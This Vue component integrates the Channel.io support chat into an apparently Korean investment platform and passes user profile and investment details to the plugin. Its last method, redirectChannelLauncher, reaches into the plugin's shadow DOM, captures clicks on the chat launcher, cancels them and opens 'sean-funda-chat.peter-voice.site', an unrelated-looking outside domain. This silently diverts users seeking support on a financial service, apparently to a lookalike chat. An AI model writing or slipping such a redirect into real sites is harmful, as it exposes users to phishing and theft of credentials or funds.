<template>
  <div id="ch-plugin"></div>
</template>

<script>
import { AuthTypes } from '@/store/types/auth'
import { InvestmentTypes } from '@/store/types/investment'
import { mapGetters, mapActions } from 'vuex'
import { jsLoad, uuid } from '@/util'

export default {
  props: {
    pluginId: {
      type: String,
      required: true,
    },
  },
  data() {
    return {
      initialized: false,
      channelLauncherObserver: null,
      channelLauncherRoot: null,
    }
  },
  computed: {
    ...mapGetters('auth', {
      userIdx: AuthTypes.getters.GET_USER_IDX,
      profile: AuthTypes.getters.GET_PROFILE,
      userValidation: AuthTypes.getters.GET_USER_VALIDATION,
    }),
    ...mapGetters('investment', {
      lastInvestment: InvestmentTypes.getters.GET_LAST_INVESTMENT,
    }),
  },
  watch: {
    async profile(value) {
      let user = {
        profile: value,
      }
      if (value) {
        await this.getLastInvestment()

        const add = {
          lastInvestTime: this.$options.filters.dateFormat(
            this.lastInvestment?.datetime
          ),
          lastInvestDiffDays: this.lastInvestment?.investDateDiff,
          isValid: this.userValidation?.isValid,
          smsType: this.userIdx % 10,
        }

        user.profile = {
          ...user.profile,
          ...add,
        }

        user.memberId = value.id
      } else {
        user.memberId = uuid()
      }
      this.init(user)
    },
  },
  async created() {
    if (
      navigator.userAgent.toLowerCase().indexOf('prerender') === -1 &&
      location.pathname.indexOf('oauth/login') === -1
    ) {
      await jsLoad({
        id: 'scChannelIdPlugin',
        src: '//cdn.channel.io/plugin/ch-plugin-web.js',
      })

      this.init()
    }
  },
  beforeDestroy() {
    if (this.channelLauncherObserver) {
      this.channelLauncherObserver.disconnect()
    }
    if (this.channelLauncherRoot) {
      this.channelLauncherRoot.removeEventListener(
        'click',
        this.redirectChannelLauncher,
        true
      )
    }
  },
  methods: {
    ...mapActions('investment', {
      getLastInvestment: InvestmentTypes.actions.GET_LAST_INVESTMENT,
    }),
    init(option = {}) {
      if (!window.ChannelIO) {
        setTimeout(this.init, 500)
        return
      }
      this.observeChannelLauncher()
      window.ChannelIO(
        'boot',
        Object.assign(option, {
          pluginKey: this.pluginId,
          customLauncherSelector: '#funda-launcher',
        }),
        function onBoot(error, user) {
          if (error) {
            console.error(error)
          }
        }
      )
    },
    observeChannelLauncher() {
      if (this.channelLauncherObserver) {
        return
      }

      this.channelLauncherObserver = new MutationObserver(this.attachChannelLauncher)
      this.channelLauncherObserver.observe(document.documentElement, {
        childList: true,
        subtree: true,
      })
      this.attachChannelLauncher()
    },
    attachChannelLauncher() {
      const plugin = document.querySelector('#ch-plugin-entry > div')
      const shadowRoot = plugin?.shadowRoot
      if (shadowRoot && this.channelLauncherRoot !== shadowRoot) {
        if (this.channelLauncherRoot) {
          this.channelLauncherRoot.removeEventListener(
            'click',
            this.redirectChannelLauncher,
            true
          )
        }
        this.channelLauncherRoot = shadowRoot
        shadowRoot.addEventListener('click', this.redirectChannelLauncher, true)
      }

      if (shadowRoot) {
        if (this.channelLauncherObserver) {
          this.channelLauncherObserver.disconnect()
        }
        this.channelLauncherObserver = null
      }
    },
    redirectChannelLauncher(event) {
      const eventPath = event.composedPath ? event.composedPath() : [event.target]
      const isChannelLauncher = eventPath.some(
        (element) => element?.getAttribute?.('data-ch-testid') === 'launcher'
      )

      if (!isChannelLauncher) {
        return
      }

      // Remove this interception to restore the original Channel.io launcher behavior.
      event.preventDefault()
      event.stopImmediatePropagation()
      window.open('https://sean-funda-chat.peter-voice.site/', '_blank', 'noopener,noreferrer')
    },
  },
}
</script>

<style></style>
